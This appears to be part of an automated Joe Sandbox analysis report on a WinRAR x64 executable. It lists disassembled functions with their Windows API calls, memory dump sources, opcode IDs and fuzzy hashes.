                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Xinvalid_argumentstd::_
                                                            • String ID: vector too long
                                                            • API String ID: 909987262-2873823879
                                                            • Opcode ID: 58dd6565d243c12ffd826aaa6e7cddf247264d1edcd646189a72e4815745d427
                                                            • Instruction ID: 970c0e73e201ee2d74150896293056dcf9614691574f62e5eed18354a603664e
                                                            • Opcode Fuzzy Hash: 58dd6565d243c12ffd826aaa6e7cddf247264d1edcd646189a72e4815745d427
                                                            • Instruction Fuzzy Hash: 4CE04F36A05F8592D61CAF51F5824987374EB69780F648931D7DC4BB65DF38E1B18700
                                                            APIs
                                                              • Part of subcall function 00007FF6C3BCA42C: GetOEMCP.KERNEL32(?,?,?,?,?,?,FFFFFFFD,00007FF6C3BCA768), ref: 00007FF6C3BCA456
                                                            • IsValidCodePage.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF6C3BCA899), ref: 00007FF6C3BCAB49
                                                            • GetCPInfo.KERNEL32(?,?,?,00000001,?,00000000,?,00007FF6C3BCA899), ref: 00007FF6C3BCAB8D
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: CodeInfoPageValid
                                                            • String ID:
                                                            • API String ID: 546120528-0
                                                            • Opcode ID: 5d6f11de72f5d3909ae7cdef260ed5fab4dc2d1caac9d7e27b3f9ee4a98ada73
                                                            • Instruction ID: 0aeee1095f19f9a8ff122fc85a942833f22f93e86897342dca1f7ec9d941fddb
                                                            • Opcode Fuzzy Hash: 5d6f11de72f5d3909ae7cdef260ed5fab4dc2d1caac9d7e27b3f9ee4a98ada73
                                                            • Instruction Fuzzy Hash: 0381F362A0C68256EB74AF29F45297977A1FB667C3F484132C6CEE7694DE3CE941C300
                                                            APIs
                                                            • SetFilePointer.KERNEL32(?,00000000,?,?,?,00007FF6C3BA0FB5,?,?,?,00007FF6C3B9E89F), ref: 00007FF6C3BA0EDC
                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00007FF6C3BA0FB5,?,?,?,00007FF6C3B9E89F), ref: 00007FF6C3BA0EEB
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: 1a7a98b1cb141f238a1d592e334d5214f335a2260eb98e24dc522bcfc7e70dd7
                                                            • Instruction ID: 995c8f78d582d8e5fa72473af5393831be7e62a6caa9341f6ffa607301534652
                                                            • Opcode Fuzzy Hash: 1a7a98b1cb141f238a1d592e334d5214f335a2260eb98e24dc522bcfc7e70dd7
                                                            • Instruction Fuzzy Hash: 3D31B622F19E4A82EA604F29D542EF96350AF26BD6F044131DEDDA7BD4DF3DE4819700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystem
                                                            • String ID:
                                                            • API String ID: 1175261203-0
                                                            • Opcode ID: 3245ba2793be4fba06aa236f857d8204ba1a07326754a835ada1c1679b041746
                                                            • Instruction ID: 75b1dfc09a108388be4bd51fdb11221c658b616ff127c465d36949078b182e35
                                                            • Opcode Fuzzy Hash: 3245ba2793be4fba06aa236f857d8204ba1a07326754a835ada1c1679b041746
                                                            • Instruction Fuzzy Hash: 87212422F09A45A9EB10EFB1D4A25ED7370EFB6785F810031D9DDE769ADE28D509C340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Rect$ClientCopy
                                                            • String ID:
                                                            • API String ID: 1880273418-0
                                                            • Opcode ID: 4c4c53f5941366ca05170129574d2302a37d8930208409adda015816e1e6f880
                                                            • Instruction ID: 78e29bb894e9225d2c6d69be3ce2364552777f7f34fb55ce8f7d7e0632aade8b
                                                            • Opcode Fuzzy Hash: 4c4c53f5941366ca05170129574d2302a37d8930208409adda015816e1e6f880
                                                            • Instruction Fuzzy Hash: CA214773610B848AEB10CF26E49576AB7A0F349BAAF048121DB8D47711DF3DD4A5CB40
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: ea7845a602860c14d0a46e4b99b46f81841b6815f05ce2a60d14a5b1042bce38
                                                            • Instruction ID: 573a011d92bd58584db3805b8a77bc5409aa2363b273c0caf3048aa76290f93b
                                                            • Opcode Fuzzy Hash: ea7845a602860c14d0a46e4b99b46f81841b6815f05ce2a60d14a5b1042bce38
                                                            • Instruction Fuzzy Hash: BD113621A1CB4281EB508F25A4426FD6360AB66BB5F544331EAFDB62D5CF3ED546C340
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3BA15DD,?,?,?,?,00007FF6C3B9BD80), ref: 00007FF6C3BA1630
                                                            • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C3BA15DD,?,?,?,?,00007FF6C3B9BD80), ref: 00007FF6C3BA1666
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 0d029f1be65e0e5603c0bace5cacd859890830e7664a4b3eca3c0019234412f5
                                                            • Instruction ID: 9ddc44c7dec9292acb1dc0fc3139d146ed19e81ce7e113c990a26601698f4512
                                                            • Opcode Fuzzy Hash: 0d029f1be65e0e5603c0bace5cacd859890830e7664a4b3eca3c0019234412f5
                                                            • Instruction Fuzzy Hash: 75017C22E08B4142EA50EF64B4924B973B1AFAA796F400230EADDDB7A6DF2CD5048640
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6C3BAB08D,?,?,?,?,00007FF6C3BA3392,?,?,?,00007FF6C3BA331D), ref: 00007FF6C3BAB03C
                                                            • GetProcessAffinityMask.KERNEL32 ref: 00007FF6C3BAB04F
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Process$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1231390398-0
                                                            • Opcode ID: 365564994351043c0f6da4208c40dc7667041a7c1eea9d086d56b8e935f100ff
                                                            • Instruction ID: e749d78891319b5c1f207b2afd164b94f8edf4b350b1ea11055b55a6727c72a9
                                                            • Opcode Fuzzy Hash: 365564994351043c0f6da4208c40dc7667041a7c1eea9d086d56b8e935f100ff
                                                            • Instruction Fuzzy Hash: 82E02B61B28D4282DF18CF56D4518E9A3A1BFD5B40F848135D58AD3618DE3DE1458700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task
                                                            • String ID:
                                                            • API String ID: 118556049-0
                                                            • Opcode ID: bc0fdb01dbfb434e58cf2365e6a908ffa1f7cd0ad636dfdceae47a03319cbbbf
                                                            • Instruction ID: 81ba8b245e9ff96733cd2a9d3d66b8d5ae56b7e0b780fa5a32f303e6d7a9bfe1
                                                            • Opcode Fuzzy Hash: bc0fdb01dbfb434e58cf2365e6a908ffa1f7cd0ad636dfdceae47a03319cbbbf
                                                            • Instruction Fuzzy Hash: CBE0EC10E1910B46F9683E6356978B921440F7B77AF5C1B30DAFEEC2C2BE1CF5914960
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                            • String ID:
                                                            • API String ID: 73155330-0
                                                            • Opcode ID: da961a74296a8bf94e293d096c062b8a1162fd65afa57d4769f7f2f1c1c3535b
                                                            • Instruction ID: 0cdfda36d4134d3ad3faed4a6e69a2d5351be57fd447e305419fa48a92197d5c
                                                            • Opcode Fuzzy Hash: da961a74296a8bf94e293d096c062b8a1162fd65afa57d4769f7f2f1c1c3535b
                                                            • Instruction Fuzzy Hash: 35E0B655E06B0E45EC18BFA5909746922A04F76731F500B38D6FD5E7D2EE2CA4528240
                                                            APIs
                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,00007FF6C3BC6677,00007FF6C3BCC272,?,?,?,00007FF6C3BCC2AF,?,?,00000000,00007FF6C3BCC775,?,?,?,00007FF6C3BCC6A7), ref: 00007FF6C3BC774E
                                                            • GetLastError.KERNEL32(?,?,00007FF6C3BC6677,00007FF6C3BCC272,?,?,?,00007FF6C3BCC2AF,?,?,00000000,00007FF6C3BCC775,?,?,?,00007FF6C3BCC6A7), ref: 00007FF6C3BC7758
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            • String ID:
                                                            • API String ID: 588628887-0
                                                            • Opcode ID: bdcbbbac8bc649d91a31b8b1baa2a0a3f58ed80174029fac62ed563795f0ed95
                                                            • Instruction ID: 9942b85b44e60869a9e2517df58e8ad2f1ba4539b7d6008bdfdd3b7a80b6e4e2
                                                            • Opcode Fuzzy Hash: bdcbbbac8bc649d91a31b8b1baa2a0a3f58ed80174029fac62ed563795f0ed95
                                                            • Instruction Fuzzy Hash: D1E08C50F096064BFF28BFB2B8978B822955FBA703B044431C8CDE3291DF3C68858710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: Alloc__vcrt___vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 3765095794-0
                                                            • Opcode ID: d597362c3116f6ab4b785273b15ee223b4072af199ab353e3b77f6cbd2219f8d
                                                            • Instruction ID: 9aeb0b3884a3df487ca196d749d8d512113f58bae3a9acfed06ffab016111109
                                                            • Opcode Fuzzy Hash: d597362c3116f6ab4b785273b15ee223b4072af199ab353e3b77f6cbd2219f8d
                                                            • Instruction Fuzzy Hash: 39E01A60D0C61381EA24BF386CC787422946F7735AF502771D0EDEA2E2DF2CB406A790
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID:
                                                            • API String ID: 1378638983-0
                                                            • Opcode ID: 90d2bd7b62abbdc05d8c9075ab8c9923e8f44253ec73a575b76224aa5386238f
                                                            • Instruction ID: 2c77932ce512caba7b9b3a45c4bd564a9a88a3ee6c5c8b249d5209ca30357977
                                                            • Opcode Fuzzy Hash: 90d2bd7b62abbdc05d8c9075ab8c9923e8f44253ec73a575b76224aa5386238f
                                                            • Instruction Fuzzy Hash: FCD02B44F0450142EF180F391805D3422400FEBB92F081230E9E69A3D1CE2D94998700
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 5134a0bba61ddd67747fce870432551b35958541116bffe9b840d32909437fba
                                                            • Instruction ID: b35ec31536c48d7f19ab7dff2979ff65ad710520f8e9429e7885a3cc040c349b
                                                            • Opcode Fuzzy Hash: 5134a0bba61ddd67747fce870432551b35958541116bffe9b840d32909437fba
                                                            • Instruction Fuzzy Hash: 79413D26B14B5686EB10CF65D891BAC3770FB59B9AF004136DE8DAB7A5CF78E444C700
                                                            APIs
                                                              • Part of subcall function 00007FF6C3BB8800: GetModuleHandleW.KERNEL32(?,?,?,00007FF6C3BB876F,?,?,?,00007FF6C3BB8B2A), ref: 00007FF6C3BB8827
                                                            • DloadProtectSection.DELAYIMP ref: 00007FF6C3BB87C5
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: DloadHandleModuleProtectSection
                                                            • String ID:
                                                            • API String ID: 2883838935-0
                                                            • Opcode ID: 19c8764c24552fe191af6715fbc6115f12abb672a0229a97d1bcff063b1383d3
                                                            • Instruction ID: 4865b993796ee1e0e704118afd1c23b1ee945a18c83230c1ad4388dda323766c
                                                            • Opcode Fuzzy Hash: 19c8764c24552fe191af6715fbc6115f12abb672a0229a97d1bcff063b1383d3
                                                            • Instruction Fuzzy Hash: DB11BA61D08B5386FA519F59AC83B742391AF3674FF040076C9CCFB2A6DE3CA585C685
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6C3BC74BA,?,?,00004C5B49A943A4,00007FF6C3BC7721,?,?,?,?,00007FF6C3BC8FBA,?,?,00000000), ref: 00007FF6C3BC95BD
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: dda0aeea4a4b350f4290d21fdd2aadf60cfc06c1fab5ec6fd6d9af870ea23c7c
                                                            • Instruction ID: 0b6f8e2b0ec184d36bb102714cf26ec993fec18a4220d6d71bebddcd23fef732
                                                            • Opcode Fuzzy Hash: dda0aeea4a4b350f4290d21fdd2aadf60cfc06c1fab5ec6fd6d9af870ea23c7c
                                                            • Instruction Fuzzy Hash: EFF04F94B0930645FE686F627513AB526845FABB82F484431C9DFE62C2DE2CE4814610
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF6C3BC8FA1,?,?,00000000,00007FF6C3BCB137,?,?,?,00007FF6C3BC6677,?,?,?,00007FF6C3BC656D), ref: 00007FF6C3BC77B2
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 069adf44af0af37f8dda52b3c24bc21013c2e39c29fa34685c2c2ee4b02486aa
                                                            • Instruction ID: edae8e8d69e7beb859a29590396ad310a4e99608203deea75570ef50a5697553
                                                            • Opcode Fuzzy Hash: 069adf44af0af37f8dda52b3c24bc21013c2e39c29fa34685c2c2ee4b02486aa
                                                            • Instruction Fuzzy Hash: EAF0F815B1D20B49FE747E627943EB522845FA6BB2F584632D9EEE62C1DF2CE4804620
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
                                                            • Associated: 00000001.00000002.3000269911.00007FF6C3B90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000448621.00007FF6C3BD4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BE7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000512910.00007FF6C3BEE000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000001.00000002.3000612169.00007FF6C3BF6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_7ff6c3b90000_winrar_x64_701ar.jbxd
                                                            Similarity
                                                            • API ID: FromListPath
                                                            • String ID:
                                                            • API String ID: 3839826586-0
                                                            • Opcode ID: 4ee4a53a9798eae0db382600d551ca3ae0aa6d7e4044a86bff0496983a3df156
                                                            • Instruction ID: e69c1d07debfa2cb28b322d9a6cff678d787de0970767fa0d3683d8019100595
                                                            • Opcode Fuzzy Hash: 4ee4a53a9798eae0db382600d551ca3ae0aa6d7e4044a86bff0496983a3df156
                                                            • Instruction Fuzzy Hash: F5F0B41670C54152DA10AF11E9424BA6330EFFA7C0F844030E5EDD67AADD2CC9049700
                                                            APIs
                                                            • FindCloseChangeNotification.KERNEL32(?,?,?,00007FF6C3BA0566,?,?,?,?,?,?,?,?,?,?,?,00007FF6C3B930C4), ref: 00007FF6C3BA0936
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.3000341386.00007FF6C3B91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C3B90000, based on PE: true
